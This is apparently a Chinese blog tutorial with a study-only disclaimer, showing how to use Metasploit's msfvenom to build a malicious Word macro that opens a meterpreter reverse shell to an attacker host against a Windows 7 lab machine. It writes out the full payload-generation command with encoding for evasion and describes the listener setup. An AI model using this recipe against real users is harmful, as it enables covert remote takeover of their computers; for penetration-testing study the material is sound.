MSF利用宏病毒感染word文档获取shell复现
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF利用宏病毒感染word文档获取shell复现。
免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!
一、环境准备
在本文中,我们尝试使用MSF生成宏病毒,制作一个携带宏病毒的word文档,并尝试渗透一个Windows7设备。
在本次实战中,我们的Windows7设备上要安装Office2007软件,并且启用宏功能。
二、宏文档生成
首先,我们来生成一个携带宏病毒的word文档,执行命令:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.136.199 LPORT=4444 -e x86/shikata-ga_nai -i 10 -f vba-exe
在上述命令中,-f参数后面是vba-exe,表示生成一个VB的宏脚本。
可以生成一个宏木马,该命令执行结果如下所示:
该命令的执行结果分为两部分,一部分是宏代码,如下所示:
另一部分是文档中的内容,如下所示:
我们打开一个word文档,在“视图”页面,来创建一个“宏”,我们输入宏名(随意),接下来,宏的位置这里我们选择在文档内部,如下所示:
之后,我们将Kali Linux上刚才生成的宏部分粘贴到word文档处,如下所示:
然后,我们再把文档部分粘贴到word文档中,如下所示:
这样,我们的宏文件就生成了。
三、效果检验
最后,我们来检验一下刚才配置的结果。
在Kali Linux上,我们使用exploit/multi/handler模块,并设置payload和各项参数如下所示:
之后,我们运行该模块开启监听。此时,我们在Windows设备上,打开该文档,发现并没有发现任何现象。但是当我们回到Kali Linux时,我们会发现已经获取到了Windows主机的连接,如下所示:
从上图可以看出,我们获取到了目标Windows7设备的管理员权限。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200
相关文章
- linux shell 进去 uefi,怎么进入EFI Shell及怎么为UEFI截图「建议收藏」
- 基于Vision Transformers的文档理解简介
- 国产开源基于.net实现的本地文档全文索引定位器,本地文本搜索神器
- IDEA 插件上新! 生成接口文档就是这么快!
- SHELL – shell 脚本获取本机ip并将ip复制给变量待用详解程序员
- 学习Linux玩转Shell脚本(linux编写shell脚本)
- Oracle拿走Shell,带来新的希望(oracle拿shell)
- 去抓取数据Oracle通过Shell脚本抓取数据(oracle拿shell)
- 安全保护Linux用户Shell安全的措施(linux用户shell)
- 脚本MySQL重构之旅:用Shell脚本简洁编写(mysql写shell)
- 学习Linux:掌握Shell修改技巧(linux修改shell)
- 删除订单BOM的链接的文档(linked document)[BAPI_DOCUMENT_SAVEOBJECTLINKS]详解编程语言
- 《Python3.6官方文档》– 第二章 使用python解释器
- 《以太坊官方文档》Ethereum Clients—Choosing a client
- 「Redis PHP 文档完全指南」(redisphp文档)
- 使用 Linux 中文 Shell 轻松愉悦的掌握命令行(linux中文shell)
- Linux命令大全:快速掌握常用指令的帮助文档(linux命令帮助文档)
- 命令提升效率:学习Linux的常用Shell命令(linux常用shell)
- 深入学习:Linux系统如何进入Shell操作界面?(linux进入shell)
- mssql注入漏洞利用:黑客获取Shell权限(mssql注入shell)
- Linux定时自动运行Shell脚本,极大提升工作效率(linux定时执行shell脚本)
- Linux下常见Shell Command使用技巧(linux常用shell)
- Shell脚本调用Redis解决数据缓存问题(shell调redis)
- Shell 命令行操作 Redis简单高效(shell 操作redis)
- 通过Shell脚本管理Redis数据库(shell打开redis)
- 在Shell中使用Redis快速管理你的数据(shell使用redis)
- Linux下使用Redis优化你的Shell命令(shell上redis)
- 使用MYSQL下载文档制作流程,获得高效便捷的数据库管理工具(MYSQL下载文档制作)
- 脚本通过Redis获取Shell脚本的简单方法(redis获得shell)
- 《Linkerd官方文档》Linkerd是什么?
- 从ASP.NET得到MicrosoftWord文档的代码
- 解析在.net中使用XSLT转换xml文档的示例详解